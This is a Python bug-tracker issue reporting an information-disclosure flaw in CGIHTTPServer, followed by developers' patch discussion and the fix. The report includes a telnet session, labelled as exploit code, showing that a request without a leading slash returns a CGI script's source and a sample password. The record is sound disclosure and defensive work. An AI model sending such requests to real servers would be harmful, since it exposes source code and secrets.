Classification
Title: Python CGIHTTPServer information disclosure
Type: security
Stage:
Components: Library (Lib)
Versions: Python 3.0, Python 2.6, Python 2.5

Process
Status: closed
Resolution: fixed
Dependencies:
Superseder:
Assigned To: gregory.p.smith
Nosy List: gpolo, gregory.p.smith, m.sucajtys
Priority: normal
Keywords: patch

Created on 2008-03-07 19:59 by m.sucajtys, last changed 2009-04-06 06:39 by gregory.p.smith. This issue is now closed.

Files
File name                           Uploaded                   Description
CGIHTTPServer_is_cgi_fix2.diff      gpolo, 2008-03-07 21:10
CGIHTTPServer_is_cgi_doc_fix.diff   gpolo, 2008-03-07 21:38    is_cgi docstring correction
Messages (7)
msg63361 - Author: sumar (m.sucajtys) Date: 2008-03-07 19:59
================================================================================
Summary:
================================================================================
An information disclosure flaw exists in the standard Python CGIHTTPServer
module.
The bug is confirmed in Python 2.5 on Fedora 7 (python-2.5-15.fc7).

================================================================================
Description:
================================================================================
Requesting a CGI script (for example test.py) without a / at the beginning of the URL
causes the script content/code to be returned instead of the script being executed.
It could lead to disclosure of secret information, e.g. a password.

================================================================================
Exploit code:
================================================================================
Connected to localhost.
Escape character is '^]'.
GET cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 14:55:30 GMT
Content-type: text/plain
Content-Length: 150
Last-Modified: Fri, 07 Mar 2008 14:55:04 GMT

#!/usr/bin/env python

print 'Content-Type: text/html'
print 'Cache-Control: no-cache'
print
print 'Hello'
passwd='secret'
path=/opt/myapp/secretpath
Connection closed by foreign host.

================================================================================
Correct request:
================================================================================
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 15:01:03 GMT
Content-Type: text/html
Cache-Control: no-cache

Hello
Connection closed by foreign host.

================================================================================
msg63364 - Author: Guilherme Polo (gpolo) (Python committer) Date: 2008-03-07 21:06
I'm attaching a patch that fixes this; it was done against rev 61179 (trunk).

Note that the is_cgi method is incorrectly documented, even more so now. Only
the first line in its docstring is correct now; before this patch, the last
paragraph was correct too.
msg63365 - Author: Guilherme Polo (gpolo) (Python committer) Date: 2008-03-07 21:10
Oops, I was doing some tests in the last patch and left a bug in it. I'm
attaching a new one.
msg63368 - Author: Guilherme Polo (gpolo) (Python committer) Date: 2008-03-07 21:38
This corrects the is_cgi docstring (maybe this should be done in a new
issue?). It also removes a part of it that I believe is not
necessary; someone correct me if I'm wrong.
msg67335 - Author: Gregory P. Smith (gregory.p.smith) (Python committer) Date: 2008-05-25 09:23
Could you please create a test case for this as a patch to
Lib/test/test_httpservers.py?

Thanks!
msg85596 - Author: Gregory P. Smith (gregory.p.smith) (Python committer) Date: 2009-04-06 00:23
FYI: your patch does not work on Windows as it uses os.path for URI
manipulation. That means it behaves differently with regard to / and \
depending on the platform.

I'm making a new one. I've written a unit test. Should be fixed soon.
msg85614 - Author: Gregory P. Smith (gregory.p.smith) (Python committer) Date: 2009-04-06 06:39
Fixed in trunk r71303.

This potentially changes the behavior of CGIHTTPServer (for the better)
so this is probably not appropriate to backport to a release branch
unless someone really considers the security of this to be severe.

If backported, the new module function should be expanded inline to
avoid adding a new (though undocumented) API.

Closing.
History
Date                 User             Action
2009-04-06 06:39:35  gregory.p.smith  set
    status: open -> closed
    resolution: fixed
    messages: + msg85614
    versions: + Python 2.6, Python 3.0
2009-04-06 06:24:35  gregory.p.smith  set
    files: - CGIHTTPServer_is_cgi_fix.diff
2009-04-06 00:23:31  gregory.p.smith  set
    messages: + msg85596
2008-05-25 09:23:25  gregory.p.smith  set
    priority: normal
    assignee: gregory.p.smith
    messages: + msg67335
    nosy: + gregory.p.smith
2008-03-07 21:38:38  gpolo            set
    files: + CGIHTTPServer_is_cgi_doc_fix.diff
    messages: + msg63368
2008-03-07 21:10:19  gpolo            set
    files: + CGIHTTPServer_is_cgi_fix2.diff
    messages: + msg63365
2008-03-07 21:06:02  gpolo            set
    files: + CGIHTTPServer_is_cgi_fix.diff
    keywords: + patch
    messages: + msg63364
    nosy: + gpolo
2008-03-07 19:59:44  m.sucajtys       create